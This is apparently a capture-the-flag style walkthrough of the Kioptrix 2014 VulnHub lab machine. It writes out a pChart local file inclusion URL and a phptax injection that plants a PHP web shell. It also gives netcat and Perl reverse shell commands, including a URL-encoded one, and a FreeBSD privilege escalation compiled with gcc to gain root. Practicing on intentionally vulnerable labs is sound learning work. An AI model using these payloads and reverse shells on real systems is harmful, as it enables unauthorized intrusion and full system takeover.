I previously thought there were only 4 Kioptrix levels until I found Kioptrix 2014. For this test, the following are the things that you’ll need:
Spoiler alert! If you’re trying to practice hacking in a controlled environment, I suggest downloading Kioptrix 2014 or any other vulnerable machine from VulnHub, close this page, and do your own attack. Come back if you’re a bit lost or just need a guide.
I won’t be discussing how you can setup your virtual environment here. You just need to install Kali and Kioptrix 2014 then you’re ready. Please note that we have Kali and Kioptrix in the same local network. Boot up Kioptrix 2014 and you’ll be welcomed with this screen:
The goal of the exercise is still the same as the previous levels. We need to acquire a “root” access. At this point, we should also start Kali so there are currently two instances of VMWare (I’m using this instead of Virtual Box).
To start off, we should first identify the current local area network. In Kali, open the terminal and type in “ifconfig”. You should get a similar result like this:
The IP address of my Kali machine is 192.168.209.139 and the subnet mask is 255.255.255.0 (/24). This means that the IP address of Kioptrix should be 192.168.209.X given that X is a number between 0 and 255. We can actually find out its IP address together with the services running through nmap by typing in the command “nmap 192.168.209.0/24”. Notice that a few results popped up and a host having an IP address of 192.168.209.144 seems interesting.
We can also do another scan specific to this IP address to show the version of the services running by typing in:
nmap -sV 192.168.209.144
By the results shown, we get a more detailed report on what specific versions of services are running in Kioptrix. The results actually show two Apache services running which we can check through our browser. When visiting the service in port 80, the result is:
For the one in port 8080 however, it appears that there’s a restriction:
So going back to the one in port 80, since it’s a very simple page, checking the source would probably leave us with nothing but this one technically gives us a clue:
This website seems to have pChart 2.1.3 and visiting the link “http://192.168.209.144/pChart2.1.3/index.php” gives us this output:
A very simple research from Google actually shows us that there are vulnerabilities present in the pChart plugin.
According to the post from exploit-db, we can do a local file inclusion using the link:
http://192.168.209.144/pChart2.1.3/examples/index.php?Action=View&Script=%2f..%2f..%2fetc/passwd
This can actually be simplified to:
http://192.168.209.144/pChart2.1.3/examples/index.php?Action=View&Script=/etc/passwd
The output when visiting the link shows:
All non-root users however seem to have their shell access disabled but anyways, the file also shows us that this is a FreeBSD build and researching some more interesting files would lead us to having the httpd log paths.
By entering the httpd.config file path in the URL, we can get its contents:
Upon checking the configuration, the error log path is “/var/log/httpd-error.log” while the access log path is “/var/log/httpd-access.log”. This is a good thing to note down because we can try using these log files as some kind of an entry point for the local file inclusion vulnerability. Another interesting thing to note here would be the access conditions for port 8080.
According to that condition, if the User-Agent of the client contains “Mozilla/4.0”, access should be allowed. With this in mind, we can try changing our User-Agent in Firefox by visiting the about:config page:
Search for “useragent” and double click on “general.useragent.override” then change the value to “Mozilla/4.0”.
Once this is set, we are now able to access 192.168.209.144 at port 8080.
By clicking the link, we are presented with a new web application called “phptax”:
Upon checking this in Google, there are loads of vulnerabilities that we can probably exploit:
Trying a few however, I couldn’t send back a shell through netcat until I found this from exploit-db. By visiting the link:
192.168.209.144:8080/phptax/index.php
With these data:
- field=ourcode.php
- newvalue=<?php system($_GET[‘cmd’]);?>
Ending up in a full URL:
192.168.209.144:8080/phptax/index.php?field=ourcode.php&newvalue=<?php system($_GET[‘cmd’]);?>
The application writes “newvalue” to the “field” file which means a new PHP file named “ourcode.php” gets created with the contents of “<?php system($_GET[‘cmd’]);?>”. This further means that if we visit the PHP file “ourcode.php”, we could execute system commands in Kioptrix!
By visiting the link:
192.168.209.144:8080/phptax/data/ourcode.php?cmd=id
We should get this output:
The next thing to do here would be trying to establish a reverse shell using netcat in Kali. By typing in:
nc -lvp 5555
We should have Kali listen for an incoming connection.
Once our listener is ready, by entering the URL:
192.168.209.144:8080/phptax/data/ourcode.php?cmd=nc -nv 192.168.209.139 5555 -e /bin/bash
Kioptrix (192.168.209.144) should connect back to Kali (192.168.209.139) however this didn’t work. Further investigation arrived to these findings:
- Kioptrix has no “bash” (192.168.209.144:8080/phptax/data/ourcode.php?cmd=which bash)
- Kioptrix has “sh” (192.168.209.144:8080/phptax/data/ourcode.php?cmd=which sh)
- Trying “192.168.209.144:8080/phptax/data/ourcode.php?cmd=nc -nv 192.168.209.139 5555 -e /bin/sh” still didn’t work
- Trying to connect via telnet didn’t work
At this point, I thought about trying to use some programming languages to do the shell connection. Python was unfortunately not installed in the machine (192.168.209.144:8080/phptax/data/ourcode.php?cmd=which python) but Perl actually existed (192.168.209.144:8080/phptax/data/ourcode.php?cmd=which perl) so by having this Perl reverse shell snippet from ethicalhackx:
perl -e ‘use Socket;$i=”192.168.209.139″;$p=5555;socket(S,PF_INET,SOCK_STREAM,getprotobyname(“tcp”));if(connect(S,sockaddr_in($p,inet_aton($i)))){open(STDIN,”>&S”);open(STDOUT,”>&S”);open(STDERR,”>&S”);exec(“/bin/sh -i”);};’
We encode it as a URL format with the help of this tool, we get:
perl%20-e%20%27use%20Socket%3B%24i%3D%22192.168.209.139%22%3B%24p%3D5555%3Bsocket%28S%2CPF_INET%2CSOCK_STREAM%2Cgetprotobyname%28%22tcp%22%29%29%3Bif%28connect%28S%2Csockaddr_in%28%24p%2Cinet_aton%28%24i%29%29%29%29%7Bopen%28STDIN%2C%22%3E%26S%22%29%3Bopen%28STDOUT%2C%22%3E%26S%22%29%3Bopen%28STDERR%2C%22%3E%26S%22%29%3Bexec%28%22%2Fbin%2Fsh%20-i%22%29%3B%7D%3B%27
By visiting the link:
192.168.209.144:8080/phptax/data/ourcode.php?cmd=perl%20-e%20%27use%20Socket%3B%24i%3D%22192.168.209.139%22%3B%24p%3D5555%3Bsocket%28S%2CPF_INET%2CSOCK_STREAM%2Cgetprotobyname%28%22tcp%22%29%29%3Bif%28connect%28S%2Csockaddr_in%28%24p%2Cinet_aton%28%24i%29%29%29%29%7Bopen%28STDIN%2C%22%3E%26S%22%29%3Bopen%28STDOUT%2C%22%3E%26S%22%29%3Bopen%28STDERR%2C%22%3E%26S%22%29%3Bexec%28%22%2Fbin%2Fsh%20-i%22%29%3B%7D%3B%27
We get a shell!
From here on, the next thing to do is escalating our privilege to become root.
The version appears to be 9.0-RELEASE so after some research, this privilege escalation exploit could be the one. We can transfer this source code from Kali to Kioptrix by typing in this command in Kali:
nc -lvp 8888 < freebsd_priv.c
In Kioptrix, navigate to “/tmp” folder and type in the command:
nc -nv 192.168.209.139 8888 > freebsd_priv.c
Once the connection has been established, terminate the terminal in Kali so the file transfer connection gets terminated too.
When “freebsd_priv.c” is transferred to Kioptrix, type in:
gcc -o freebsd_priv freebsd_priv.c
The command above will compile the privilege escalation exploit. We should use CHMOD to make the compiled program executable:
chmod +x freebsd_priv
At this point, if we execute the program by typing in the command:
./freebsd_priv
We get a root shell!
Navigate into the “/root” folder and the file “congrats.txt” can be read.
I think this ends the fun times with Kioptrix as this seems to be the last level available. Will probably download other more from VulnHub and see how the “getting in” process could happen.